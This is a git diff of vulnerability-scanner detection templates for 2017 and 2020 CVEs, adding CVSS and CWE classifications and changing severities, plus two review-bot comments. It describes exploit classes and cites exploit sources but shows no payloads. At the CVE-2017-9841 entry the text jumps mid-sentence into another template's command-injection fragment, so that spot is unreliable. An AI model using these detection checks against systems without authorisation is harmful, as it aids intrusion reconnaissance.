b/cves/2017/CVE-2017-18638.yaml index fc7f16e8cc..8c240d1426 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -11,6 +11,11 @@ info: - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 tags: cve,cve2017,graphite,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-18638 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 5ccba81a04..0e0bff68e3 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -9,6 +9,10 @@ info: reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.40 + cve-id: CVE-2017-3506 requests: - raw: 
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index 2003bf9c99..b172154381 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -3,11 +3,17 @@ id: CVE-2017-3528 info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko - severity: low + severity: medium reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 tags: oracle,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2017-3528 + cwe-id: CWE-601 + description: "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)." requests: - method: GET diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml index 3e200f2bf4..e852d525d0 100644 --- a/cves/2017/CVE-2017-3881.yaml +++ b/cves/2017/CVE-2017-3881.yaml 
@@ -10,6 +10,11 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. tags: cve,cve2017,cisco,rce,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-3881 + cwe-id: CWE-20 network: - inputs: diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml index 23b1ffb9b3..835026085e 100644 --- a/cves/2017/CVE-2017-4011.yaml +++ b/cves/2017/CVE-2017-4011.yaml @@ -10,6 +10,11 @@ info: - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 tags: cve,cve2017,mcafee,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-4011 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index f7e9caec0e..75f2ff83e6 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -3,12 +3,17 @@ id: CVE-2017-5487 info: name: WordPress Core < 4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo,geeknik - severity: info + severity: medium description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://www.exploit-db.com/exploits/41497 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2017-5487 + cwe-id: CWE-200 requests: - method: GET 
diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml index 3421006395..7c792b2225 100644 --- a/cves/2017/CVE-2017-5521.yaml +++ b/cves/2017/CVE-2017-5521.yaml @@ -2,12 +2,17 @@ id: CVE-2017-5521 info: name: Bypassing Authentication on NETGEAR Routers author: princechaddha - severity: medium + severity: high description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server. reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-5521 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index ad22c9704a..0d112f3194 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -6,6 +6,11 @@ info: description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. tags: cve,cve2017,struts,rce,apache reference: https://github.com/mazen160/struts-pwn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-5638 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index f9c76aab23..38352df854 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml 
@@ -3,9 +3,15 @@ id: CVE-2017-6090 info: name: PhpCollab (unauthenticated) Arbitrary File Upload author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,phpcollab,rce,fileupload reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-6090 + cwe-id: CWE-434 + description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." requests: - raw: diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 82e8e080d4..533586dd4f 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml @@ -9,6 +9,11 @@ info: - https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py tags: cve,cve2017,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-7269 + cwe-id: CWE-119 requests: - method: OPTIONS diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml index a3ebfb4f8d..b17e18d01d 100644 --- a/cves/2017/CVE-2017-7391.yaml +++ b/cves/2017/CVE-2017-7391.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/dweeves/magmi-git/issues/522 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-7391 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index de43a2eddc..cadec418f8 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml 
@@ -15,6 +15,11 @@ info: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - https://www.exploit-db.com/exploits/41890 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-7615 + cwe-id: CWE-640 requests: - method: GET diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml index d3dde0e997..5a1fbdfe03 100644 --- a/cves/2017/CVE-2017-7921.yaml +++ b/cves/2017/CVE-2017-7921.yaml @@ -2,12 +2,17 @@ id: CVE-2017-7921 info: name: Hikvision Authentication Bypass author: princechaddha - severity: high + severity: critical description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-7921 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index ccad58de39..a4968604e8 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml 
@@ -2,10 +2,15 @@ id: CVE-2017-8917 info: name: Joomla SQL Injection author: princechaddha - severity: high + severity: critical description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. reference: https://www.cvedetails.com/cve/CVE-2017-8917/ tags: cve,cve2017,joomla,sqli + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-8917 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-9140.yaml b/cves/2017/CVE-2017-9140.yaml index cbd278de96..365d6c0957 100644 --- a/cves/2017/CVE-2017-9140.yaml +++ b/cves/2017/CVE-2017-9140.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2017,xss,telerik description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index da92a85868..843b3c84d2 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -7,6 +7,11 @@ info: description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9288 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 30ca442da3..d97ed4f5c8 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -3,13 +3,18 @@ id: CVE-2017-9506 info: name: Jira IconURIServlet SSRF author: pdteam - severity: high + severity: medium description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). reference: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 tags: cve,cve2017,atlassian,jira,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-9506 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index 0b2bfa1813..a7acef344d 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml @@ -9,6 +9,11 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html tags: cve,cve2017,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-9791 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 008a0df385..3fbcb5b5e2 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml 
@@ -3,12 +3,17 @@ id: CVE-2017-9805 info: name: Apache Struts2 S2-052 RCE author: pikpikcu - severity: critical + severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-9805 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index c2ae610bf1..10a07fec84 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -7,6 +7,11 @@ info: description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) tags: cve,cve2017,dotnetnuke,bypass reference: https://github.com/murataydemir/CVE-2017-9822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-9822 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 0a1de31159..bb1e917308 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml 
@@ -3,7 +3,7 @@ id: CVE-2017-9841 info: name: CVE-2017-9841 author: Random_Robbie,pikpikcu - severity: high + severity: critical description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " /usr/local/netsweeper/webadmin/out' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13167 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index 93175bfeeb..943d37ec28 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -3,10 +3,15 @@ id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS author: pikpikcu - severity: high + severity: medium reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. tags: cve,cve2020,xss,bitrix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index 844a1401f5..13693b822a 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -10,6 +10,11 @@ info: It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. tags: cve,cve2020,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 requests: - method: GET 
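Review bot: The severity change from high to medium in cves/2017/CVE-2017-9506.yaml rests on a vector with `UI:R/S:C/C:L/I:L/A:N`, which scores the XSS outcome the description mentions, while the template is named "Jira IconURIServlet SSRF", tagged `ssrf,oob` and classified `CWE-918`. Anyone who filters scans by severity will now run this SSRF check at a lower tier than before. If the intent is to mirror the published score regardless of what the template detects, state that in the commit message; otherwise keep `severity: high` for this file.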
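Review bot: `cwe-id: CWE-20` in cves/2017/CVE-2017-9822.yaml is less specific than the description two lines above it, which calls the issue a deserialization vulnerability; the CVE-2017-9805 hunk in this same patch uses `CWE-502` for that bug class. Either align the two or note that the values are copied verbatim from the upstream record, so later readers do not treat the difference as a typo.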
diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index 4d8a08fa63..b9095c970e 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -5,6 +5,14 @@ info: author: pdteam severity: critical tags: cve,cve2020,apache,airflow,unauth + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13927 + description: "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default" + reference: + - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E + - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html requests: - method: GET diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index be27c3f3a9..28936101f5 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -15,6 +15,11 @@ info: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html tags: cve,cve2020,apache + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-13937 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml index 6f29058963..45757b968d 100644 --- a/cves/2020/CVE-2020-13942.yaml 
+++ b/cves/2020/CVE-2020-13942.yaml @@ -15,6 +15,11 @@ info: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 tags: cve,cve2020,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13942 + cwe-id: CWE-74 requests: - method: POST diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml index d23c7a5782..50f652bb22 100644 --- a/cves/2020/CVE-2020-14092.yaml +++ b/cves/2020/CVE-2020-14092.yaml @@ -7,6 +7,11 @@ info: description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. reference: https://wpscan.com/vulnerability/10287 tags: cve,cve2020,wordpress,wp-plugin,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14092 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-14179.yaml b/cves/2020/CVE-2020-14179.yaml index 116f824ef7..d586846e72 100644 --- a/cves/2020/CVE-2020-14179.yaml +++ b/cves/2020/CVE-2020-14179.yaml @@ -7,6 +7,10 @@ info: description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1. reference: https://jira.atlassian.com/browse/JRASERVER-71536 tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14179 requests: - method: GET diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml index d50f1e806d..a71ed9dfb5 100644 --- a/cves/2020/CVE-2020-14181.yaml 
+++ b/cves/2020/CVE-2020-14181.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-71560 - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14181 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml index 5cbe2e48a3..e260ce4ca9 100644 --- a/cves/2020/CVE-2020-14413.yaml +++ b/cves/2020/CVE-2020-14413.yaml @@ -7,6 +7,11 @@ info: reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. tags: cve,cve2020,nedi,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-14413 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index 65f3b7b0f5..f46615666a 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -10,6 +10,10 @@ info: - https://www.oracle.com/security-alerts/cpuoct2020.html additional-fields: cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-14864 requests: - method: GET diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 8544701f97..50635623d5 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml 
@@ -18,6 +18,10 @@ info: attacker with network access via HTTP to compromise the server. Successful attacks of this vulnerability can result in takeover. tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14882 requests: - raw: diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 9deaa4c983..92e76199c0 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -3,10 +3,14 @@ id: CVE-2020-14883 info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam - severity: critical + severity: high description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-14883 requests: - method: POST diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml index a40edb0ae6..3b46eec92a 100644 --- a/cves/2020/CVE-2020-15129.yaml +++ b/cves/2020/CVE-2020-15129.yaml 
@@ -7,6 +7,11 @@ info: description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios. reference: https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik tags: cve,cve2020,traefik,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.70 + cve-id: CVE-2020-15129 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml index 247fac361d..1d65d8a045 100644 --- a/cves/2020/CVE-2020-15148.yaml +++ b/cves/2020/CVE-2020-15148.yaml @@ -3,11 +3,17 @@ id: CVE-2020-15148 info: name: Yii 2 (yiisoft/yii2) RCE author: pikpikcu - severity: high + severity: critical reference: - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943 - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md tags: cve,cve2020,rce,yii + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-15148 + cwe-id: CWE-502 + description: "Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory." requests: - method: GET diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml index 474fa19f0a..e483393043 100644 --- a/cves/2020/CVE-2020-15227.yaml +++ b/cves/2020/CVE-2020-15227.yaml 
